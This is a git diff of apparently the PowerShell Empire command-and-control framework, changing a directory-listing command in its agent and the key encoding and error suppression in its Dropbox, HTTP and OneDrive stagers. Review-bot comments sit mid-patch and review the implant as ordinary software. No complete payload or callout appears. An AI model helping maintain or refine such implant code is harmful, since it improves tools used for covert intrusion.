diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1
index eb25b3a..d46afd5 100644
--- a/data/agent/agent.ps1
+++ b/data/agent/agent.ps1
@@ -281,11 +281,11 @@ function Invoke-Empire {
 switch -regex ($cmd) {
 '(ls|^dir)' {
 if ($cmdargs.length -eq "") {
- $output = Get-ChildItem -force | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name
+ $output = Get-ChildItem -force | select mode,lastwritetime,length,name
 }
 else {
 try{
- $output = IEX "$cmd $cmdargs -Force -ErrorAction Stop | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name"
+ $output = IEX "$cmd $cmdargs -Force -ErrorAction Stop | select lastwritetime,length,name"
 }
 catch [System.Management.Automation.ActionPreferenceStopException] {
 $output = "[!] Error: $_ (or cannot be accessed)."
diff --git a/data/agent/stagers/dropbox.ps1 b/data/agent/stagers/dropbox.ps1
index cfc5cfe..28dee07 100644
--- a/data/agent/stagers/dropbox.ps1
+++ b/data/agent/stagers/dropbox.ps1
@@ -52,7 +52,7 @@ function Start-Negotiate {
 # try to ignore all errors
 $ErrorActionPreference = "SilentlyContinue";
- $e=[System.Text.Encoding]::ASCII;
+ $e=[System.Text.Encoding]::UTF8;
 $SKB=$e.GetBytes($SK);
 # set up the AES/HMAC crypto
diff --git a/data/agent/stagers/http.ps1 b/data/agent/stagers/http.ps1
index 77b3ed3..6abd449 100644
--- a/data/agent/stagers/http.ps1
+++ b/data/agent/stagers/http.ps1
@@ -56,8 +56,8 @@ function Start-Negotiate {
 $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
 # try to ignore all errors
- #$ErrorActionPreference = "SilentlyContinue";
- $e=[System.Text.Encoding]::ASCII;
+ $ErrorActionPreference = "SilentlyContinue";
+ $e=[System.Text.Encoding]::UTF8;
 $customHeaders = "";
 $SKB=$e.GetBytes($SK);
 # set up the AES/HMAC crypto
diff --git a/data/agent/stagers/http_com.ps1 b/data/agent/stagers/http_com.ps1
index eab45c7..9d9814c 100644
--- a/data/agent/stagers/http_com.ps1
+++ b/data/agent/stagers/http_com.ps1
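Review bot: In agent.ps1 the two branches of the `'(ls|^dir)'` case no longer return the same columns: the no-argument branch keeps `mode`, while the IEX branch now selects only `lastwritetime,length,name`, so a listing with a path silently loses the file mode. If only the per-file `Get-Acl` owner lookup was meant to go, the second select should read `select mode,lastwritetime,length,name`. The IEX line also still interpolates `$cmdargs` into a string that is evaluated as PowerShell, so the arguments are executed rather than treated as a path; the commit does not change that, but it deserves a comment on the line. The `switch` body and `Invoke-Empire` continue outside the hunk.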
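Review bot: In dropbox.ps1 (and the identical change in http.ps1, http_com.ps1 and onedrive.ps1) `$SKB=$e.GetBytes($SK)` now yields different bytes for any `$SK` containing non-ASCII characters, because `[System.Text.Encoding]::ASCII` replaces them with `?` while UTF8 encodes them as multi-byte sequences. `$SKB` appears to feed the AES/HMAC setup that follows, so the peer has to derive its key bytes with UTF-8 as well, and with `$ErrorActionPreference = "SilentlyContinue"` a mismatch would presumably fail without any message. A comment on the line would record that contract, e.g. `# $SK is encoded as UTF-8; the peer must derive its key bytes the same way`. http_mapi.ps1 is reported as a binary diff, so whether it received the same change cannot be confirmed from this page. `Start-Negotiate` continues outside each of these hunks.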
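Review bot: The http.ps1 hunk also un-comments `$ErrorActionPreference = "SilentlyContinue";`, a behaviour change unrelated to the encoding switch: from that line on, every non-terminating error in `Start-Negotiate` is suppressed. It looks like this restores parity with the other stagers, where the line is already active in the context lines, but the diff itself does not say so. Either move it to its own commit or make the intent explicit in the comment above it, e.g. `# suppress all errors (same as the other stagers)`. `Start-Negotiate` starts and ends outside the hunk.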
@@ -57,7 +57,7 @@ function Start-Negotiate {
 # try to ignore all errors
 $ErrorActionPreference = "SilentlyContinue";
- $e=[System.Text.Encoding]::ASCII;
+ $e=[System.Text.Encoding]::UTF8;
 $customHeaders = "";
 $SKB=$e.GetBytes($SK);
 # set up the AES/HMAC crypto
diff --git a/data/agent/stagers/http_mapi.ps1 b/data/agent/stagers/http_mapi.ps1
index d34a9e8..b431b75 100644
Binary files a/data/agent/stagers/http_mapi.ps1 and b/data/agent/stagers/http_mapi.ps1 differ
diff --git a/data/agent/stagers/onedrive.ps1 b/data/agent/stagers/onedrive.ps1
index 571fe5a..1e10152 100644
--- a/data/agent/stagers/onedrive.ps1
+++ b/data/agent/stagers/onedrive.ps1
@@ -52,7 +52,7 @@ function Start-Negotiate {
 # try to ignore all errors
 $ErrorActionPreference = "SilentlyContinue";
- $e=[System.Text.Encoding]::ASCII;
+ $e=[System.Text.Encoding]::UTF8;
 $SKB=$e.GetBytes($SK);
 # set up the AES/HMAC crypto